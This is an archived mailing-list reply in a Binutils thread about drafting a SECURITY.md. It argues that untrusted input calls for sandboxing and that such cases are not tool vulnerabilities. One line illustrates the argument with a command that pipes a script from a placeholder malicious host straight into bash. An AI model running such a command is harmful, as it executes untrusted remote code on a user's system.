From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: from eastern.ash.relay.mailchannels.net (eastern.ash.relay.mailchannels.net [23.83.222.55]) by sourceware.org (Postfix) with ESMTPS id 7122E3858D32; Thu, 13 Apr 2023 12:54:57 +0000 (GMT) DMARC-Filter: OpenDMARC Filter v1.4.2 sourceware.org 7122E3858D32 Authentication-Results: sourceware.org; dmarc=none (p=none dis=none) header.from=gotplt.org Authentication-Results: sourceware.org; spf=pass smtp.mailfrom=gotplt.org X-Sender-Id: dreamhost|x-authsender|siddhesh@gotplt.org Received: from relay.mailchannels.net (localhost [127.0.0.1]) by relay.mailchannels.net (Postfix) with ESMTP id 415408C22F8; Thu, 13 Apr 2023 12:54:54 +0000 (UTC) Received: from pdx1-sub0-mail-a305.dreamhost.com (unknown [127.0.0.6]) (Authenticated sender: dreamhost) by relay.mailchannels.net (Postfix) with ESMTPA id A61D38C2469; Thu, 13 Apr 2023 12:54:53 +0000 (UTC) ARC-Seal: i=1; s=arc-2022; d=mailchannels.net; t=1681390493; a=rsa-sha256; cv=none; b=T3u5cVjI9jN0j6JNVkcRqeUI+RH0rKOaqf3FgYBNULOxibkaJMfYheN16Fv7C59hMkfK2V JHMJaXrLUa4Uojj7cxXDWj4J+PXW5Kbl916lbZfEH3LMVitT8OM9Coi/rwDiiqjavllmT6 rLVtkKn53h+I90d8MBqQAn7c1HnhXZeIcurkL1bfGT50z6DV7KelX9E7X60n81Vsp//GUH hYT7aA20HeeBp7KBs3Ec0a4ol6AL2n226we0tWhItYjzTZbKbkqvKwZ2vYq2jvIwLZ/nY7 XOnRJ2q+KKmzlQV/MTfTiLEkDo4xy2o9JIvjXsL9MaPuHVGWb9FmAt9cF7LGSA== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=mailchannels.net; s=arc-2022; t=1681390493; h=from:from:reply-to:subject:subject:date:date:message-id:message-id: to:to:cc:cc:mime-version:mime-version:content-type:content-type: content-transfer-encoding:content-transfer-encoding: in-reply-to:in-reply-to:references:references:dkim-signature; bh=/RaDigsevsq6X8etFRRDvi8YpCRnx9B4duqceCcjwGk=; b=Xn8oLhtM+Cc9VCqqSZ740c2E4zRl9EvA30+kF7m0DDstXiv8f5B28NzExE/O2+o+tunWuM 7NzbwYsGSV6yT440se3PkmXuxUqwVBe0nveOktbcU3ato4GdUCjeF2SBGKHV1JqdA7NhJV IfRccRioPqX2OSCG/jYmCA6pjnRUuQIcYrpzjXOUkJcKO/cDkLM9tAZRHjVipue3cTe4QU +LnQ2SKvxeIIWhjH9ED+U1qj1ssNlDhEGVx03H7ezjr/vkruOK7VI4bJ0PUMMs6PBmh1hO +OAalXKGKbkND78m3l68fcx1bA7rgjFUXzeSSdpfb8l4UgBEa2xmeSg38tPEag== ARC-Authentication-Results: i=1; rspamd-548d6c8f77-tg4wk; auth=pass smtp.auth=dreamhost smtp.mailfrom=siddhesh@gotplt.org X-Sender-Id: dreamhost|x-authsender|siddhesh@gotplt.org X-MC-Relay: Neutral X-MailChannels-SenderId: dreamhost|x-authsender|siddhesh@gotplt.org X-MailChannels-Auth-Id: dreamhost X-Slimy-Zesty: 5c38724274ed021a_1681390493988_3248152941 X-MC-Loop-Signature: 1681390493988:968681753 X-MC-Ingress-Time: 1681390493987 Received: from pdx1-sub0-mail-a305.dreamhost.com (pop.dreamhost.com [64.90.62.162]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384) by 100.104.253.255 (trex/6.7.2); Thu, 13 Apr 2023 12:54:53 +0000 Received: from [192.168.2.12] (bras-vprn-toroon4834w-lp130-09-174-91-45-153.dsl.bell.ca [174.91.45.153]) (using TLSv1.3 with cipher TLS_AES_128_GCM_SHA256 (128/128 bits) key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest SHA256) (No client certificate requested) (Authenticated sender: siddhesh@gotplt.org) by pdx1-sub0-mail-a305.dreamhost.com (Postfix) with ESMTPSA id 4Py00Y0y4szHq; Thu, 13 Apr 2023 05:54:53 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gotplt.org; s=dreamhost; t=1681390493; bh=/RaDigsevsq6X8etFRRDvi8YpCRnx9B4duqceCcjwGk=; h=Date:Subject:To:Cc:From:Content-Type:Content-Transfer-Encoding; b=C3mG/2ii2z9ueoCBQWX5Ay+K+1LlnkYgEj5l9mV+60wRKvN7XbpehSrVHwyDe4P0m tNzZl+G+VRWWWFpfBGDv1p8TKSQ6ki2mFW9tU0oOhUd+kijdsNsyvKdiJk6oJaVxVy Tzya8S6fe9feqOMizjsLuWFnYLsx5oE4puCG9SLNN0QfrFgI9N+pLqTqCCISrHFuhT GFntPnB240WuMpvhIQiTP4hXPKfKEfA/wjopFWUtvGQZKJJZzMDhpmBto/HFX9ftW8 PHWqwfUbQ8o2D9Hr+odzgzBFnDWcp/hlXi9oylWR5S/4QXNSBzhjm109doRrDEdGxr 3WyLHNVV1074A== Message-ID: Date: Thu, 13 Apr 2023 08:54:51 -0400 MIME-Version: 1.0 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Thunderbird/102.9.1 Subject: Re: RFC: Adding a SECURITY.md document to the Binutils Content-Language: en-US To: Richard Earnshaw , Nick Clifton , Binutils Cc: "gdb@sourceware.org" References: <1c38b926-e003-0e21-e7f1-3d5dbec2aabf@redhat.com> <5b147005-bd28-4cf9-b9e7-479ef02cb1ad@foss.arm.com> <5d044987-39eb-a060-1b2b-9d07b1515e7d@gotplt.org> <73bc480a-a927-2773-8756-50350f76dfbf@gotplt.org> <4ed86e65-0b7f-11d4-8061-2c5d0b1e147e@foss.arm.com> <7b6b10f8-e480-8efa-fbb8-4fc4bf2cf356@gotplt.org> From: Siddhesh Poyarekar In-Reply-To: Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 8bit X-Spam-Status: No, score=-3027.8 required=5.0 tests=BAYES_00,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,KAM_SHORT,MEDICAL_SUBJECT,NICE_REPLY_A,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_NONE,SPF_PASS,TXREP autolearn=no autolearn_force=no version=3.4.6 X-Spam-Checker-Version: SpamAssassin 3.4.6 (2021-04-09) on server2.sourceware.org List-Id: On 2023-04-13 08:37, Richard Earnshaw wrote: >> "Direct compromise of security" is essentially what we're trying to >> define more strongly to prevent spurious CVE assignments. > > If a user can be tricked into opening a corrupt file (eg object file) > and that causes a buffer overflow that's then used to send another file > to a third party, you can't really pretend that's not a direct > compromise of security.  We live in the real world and this sort of > threat is real. I agree that this sort of threat is real, which is why we should recommend sandboxing to deal with corrupt/untrusted files. There is no way that any program can be secured against untrusted input *after* it has been supplied to it, especially if the input is in a Turing complete form, like a program or a script. This is why when one does a: curl -s http://evil.website/malicious-script.sh | bash it is a legitimate security issue, but it's not a vulnerability in bash, nor can it be secured in bash. One must either do this in a sandbox to contain its impact in that sandbox, or do a secondary analysis (again in a sandbox) to determine that it is safe. >>> a vulnerability in the generated output that was not already present >>> in the files used as input. >>> >>> Note: none of the programs in the GNU Binutils suite need elevated >>> system privileges (eg setuid) to operate and we recommend that users >>> do not use them from accounts where such privileges are automatically >>> available. >> >> We did have CVE-2021-20197, so it's not always setuid. > > > Which is exactly the sort of scenario I was trying to exclude by this > statement - don't run the tools with elevated privileges. I should have clarified that I agree, just that mentioning setuid might lull users into believing that this threat model is only related to setuid. Sid